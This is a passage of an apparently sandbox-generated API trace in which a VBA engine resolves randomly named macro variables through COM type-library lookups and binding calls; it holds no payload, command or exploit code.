ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.400] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="kQBC_B") returned 0x102c8e [0069.400] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x7, _Src="kQBC_B" | out: _Dst="kQBC_B") returned 0x0 [0069.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=7, lpWideCharStr=0x144af0, cchWideChar=7 | out: lpWideCharStr="kQBC_B") returned 7 [0069.400] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.400] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="kQBC_B", lHashVal=0x102c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.400] IUnknown:Release (This=0x665ba50) returned 0xd [0069.400] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.400] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="kQBC_B", lHashVal=0x102c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.400] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.400] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.400] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="kQBC_B", lHashVal=0x102c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.400] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.400] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.400] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="kQBC_B", lHashVal=0x102c8e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.400] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b8084e, cbMultiByte=7, lpWideCharStr=0x144d40, cchWideChar=8 | out: lpWideCharStr="kQBC_B") returned 7 [0069.400] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="kQBC_B", lHashVal=0x102c8e, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.400] IMalloc:Alloc (This=0x7fefec05380, cb=0xe) returned 0x67c2d40 [0069.400] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x7, _Src=0x3b8084e | out: _Dst=0x67c2d40) returned 0x0 [0069.400] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_kQBC_B") returned 0x10a737 [0069.400] strcpy_s (in: _Dst=0x144e50, _DstSize=0xe, _Src="_B_var_kQBC_B" | out: _Dst="_B_var_kQBC_B") returned 0x0 [0069.400] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=14, lpWideCharStr=0x144ca0, cchWideChar=14 | out: lpWideCharStr="_B_var_kQBC_B") returned 14 [0069.400] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.400] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_kQBC_B", lHashVal=0x10a737, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.400] IUnknown:Release (This=0x665ba50) returned 0xd [0069.400] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.401] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_kQBC_B", lHashVal=0x10a737, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.401] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.401] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.401] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_kQBC_B", lHashVal=0x10a737, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.401] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.401] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.401] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_kQBC_B", lHashVal=0x10a737, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.401] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.401] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.401] IUnknown:Release (This=0x665ba50) returned 0xd [0069.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1289e, cbMultiByte=14, lpWideCharStr=0x144d00, cchWideChar=15 | out: lpWideCharStr="_B_var_kQBC_B") returned 14 [0069.401] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_kQBC_B", lHashVal=0x10a737, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x5f004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6b005f00720061, ppTypeComp=0x5f004300000000, pDummy=0x0) returned 0x0 [0069.401] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x7, _Src=0x3b8084e | out: _Dst=0x144ec0) returned 0x0 [0069.401] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qBD_xAwA", lHashVal=0x10dacf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80876, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qBD_xAwA") returned 9 [0069.401] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qBD_xAwA", lHashVal=0x10dacf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80876, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qBD_xAwA") returned 9 [0069.401] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qBD_xAwA", lHashVal=0x10dacf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.401] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qBD_xAwA") returned 0x10dacf [0069.401] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="qBD_xAwA" | out: _Dst="qBD_xAwA") returned 0x0 [0069.401] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="qBD_xAwA") returned 9 [0069.402] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.402] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qBD_xAwA", lHashVal=0x10dacf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.402] IUnknown:Release (This=0x665ba50) returned 0xd [0069.402] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.402] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qBD_xAwA", lHashVal=0x10dacf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.402] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.402] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.402] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qBD_xAwA", lHashVal=0x10dacf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.402] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.402] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.402] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qBD_xAwA", lHashVal=0x10dacf, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.402] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b80876, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="qBD_xAwA") returned 9 [0069.402] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qBD_xAwA", lHashVal=0x10dacf, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.402] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.402] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b80876 | out: _Dst=0x67c2d40) returned 0x0 [0069.402] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qBD_xAwA") returned 0x10b258 [0069.402] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_qBD_xAwA" | out: _Dst="_B_var_qBD_xAwA") returned 0x0 [0069.402] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_qBD_xAwA") returned 16 [0069.402] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.402] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_qBD_xAwA", lHashVal=0x10b258, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.402] IUnknown:Release (This=0x665ba50) returned 0xd [0069.402] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.402] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_qBD_xAwA", lHashVal=0x10b258, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.402] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.402] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.402] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_qBD_xAwA", lHashVal=0x10b258, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.403] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.403] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.403] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_qBD_xAwA", lHashVal=0x10b258, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.403] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.403] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.403] IUnknown:Release (This=0x665ba50) returned 0xd [0069.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b128ce, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_qBD_xAwA") returned 16 [0069.403] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_qBD_xAwA", lHashVal=0x10b258, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x78005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x71005f00720061, ppTypeComp=0x78005f00000000, pDummy=0x0) returned 0x0 [0069.403] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b80876 | out: _Dst=0x144ec0) returned 0x0 [0069.403] ITypeComp:RemoteBind (in: This=0x665ba60, szName="nDAUUDQG", lHashVal=0x101f4e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nDAUUDQG") returned 9 [0069.403] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="nDAUUDQG", lHashVal=0x101f4e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nDAUUDQG") returned 9 [0069.403] ITypeComp:RemoteBind (in: This=0x665bd30, szName="nDAUUDQG", lHashVal=0x101f4e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.403] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="nDAUUDQG") returned 0x101f4e [0069.403] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="nDAUUDQG" | out: _Dst="nDAUUDQG") returned 0x0 [0069.403] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="nDAUUDQG") returned 9 [0069.403] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.403] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="nDAUUDQG", lHashVal=0x101f4e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.403] IUnknown:Release (This=0x665ba50) returned 0xd [0069.403] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.404] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="nDAUUDQG", lHashVal=0x101f4e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.404] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.404] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.404] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="nDAUUDQG", lHashVal=0x101f4e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.404] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.404] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.404] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="nDAUUDQG", lHashVal=0x101f4e, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.404] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808a2, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="nDAUUDQG") returned 9 [0069.404] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="nDAUUDQG", lHashVal=0x101f4e, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.404] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.404] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b808a2 | out: _Dst=0x67c2d40) returned 0x0 [0069.404] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_nDAUUDQG") returned 0x10f716 [0069.404] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_nDAUUDQG" | out: _Dst="_B_var_nDAUUDQG") returned 0x0 [0069.404] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_nDAUUDQG") returned 16 [0069.404] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.404] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_nDAUUDQG", lHashVal=0x10f716, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.404] IUnknown:Release (This=0x665ba50) returned 0xd [0069.404] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.404] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_nDAUUDQG", lHashVal=0x10f716, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.404] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.404] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.404] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_nDAUUDQG", lHashVal=0x10f716, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.404] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.404] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.404] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_nDAUUDQG", lHashVal=0x10f716, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.404] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.405] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.405] IUnknown:Release (This=0x665ba50) returned 0xd [0069.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b128fe, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_nDAUUDQG") returned 16 [0069.405] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_nDAUUDQG", lHashVal=0x10f716, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x6e005f00720061, ppTypeComp=0x55005500000000, pDummy=0x0) returned 0x0 [0069.405] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3b808a2 | out: _Dst=0x144ec0) returned 0x0 [0069.405] ITypeComp:RemoteBind (in: This=0x665ba60, szName="V4wC11xA", lHashVal=0x1091ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V4wC11xA") returned 9 [0069.405] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="V4wC11xA", lHashVal=0x1091ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V4wC11xA") returned 9 [0069.405] ITypeComp:RemoteBind (in: This=0x665bd30, szName="V4wC11xA", lHashVal=0x1091ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.405] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="V4wC11xA") returned 0x1091ef [0069.405] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="V4wC11xA" | out: _Dst="V4wC11xA") returned 0x0 [0069.405] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="V4wC11xA") returned 9 [0069.405] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.405] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="V4wC11xA", lHashVal=0x1091ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.405] IUnknown:Release (This=0x665ba50) returned 0xd [0069.405] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.405] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="V4wC11xA", lHashVal=0x1091ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.405] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.405] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.405] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="V4wC11xA", lHashVal=0x1091ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.405] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.406] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.406] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="V4wC11xA", lHashVal=0x1091ef, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0069.406] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3b808fa, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="V4wC11xA") returned 9 [0069.406] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="V4wC11xA", lHashVal=0x1091ef, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0069.406] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0069.406] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3b808fa | out: _Dst=0x67c2d40) returned 0x0 [0069.406] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_V4wC11xA") returned 0x106978 [0069.406] CompareStringA (Locale=0x409, dwCmpFlags=0x30001, lpString1="_B_var_sAAAAQ", cchCount1=-1, lpString2="_B_var_V4wC11xA", cchCount2=-1) returned 1 [0069.406] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_V4wC11xA" | out: _Dst="_B_var_V4wC11xA") returned 0x0 [0069.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_V4wC11xA") returned 16 [0069.406] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.406] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_V4wC11xA", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.406] IUnknown:Release (This=0x665ba50) returned 0xd [0069.406] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0069.406] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_V4wC11xA", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.406] IUnknown:Release (This=0x631b4c0) returned 0xb [0069.406] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0069.406] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_V4wC11xA", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.406] IUnknown:Release (This=0x665bd20) returned 0x6 [0069.406] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0069.406] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_V4wC11xA", lHashVal=0x106978, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0069.406] IUnknown:Release (This=0x665b4b0) returned 0x4 [0069.406] IUnknown:AddRef (This=0x665ba50) returned 0xe [0069.406] IUnknown:Release (This=0x665ba50) returned 0xd [0069.406] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b1292e, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_V4wC11xA") returned 16 [0069.407] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_V4wC11xA", lHashVal=0x106978, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, ppTypeComp=0x31004300000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x56005f00720061, 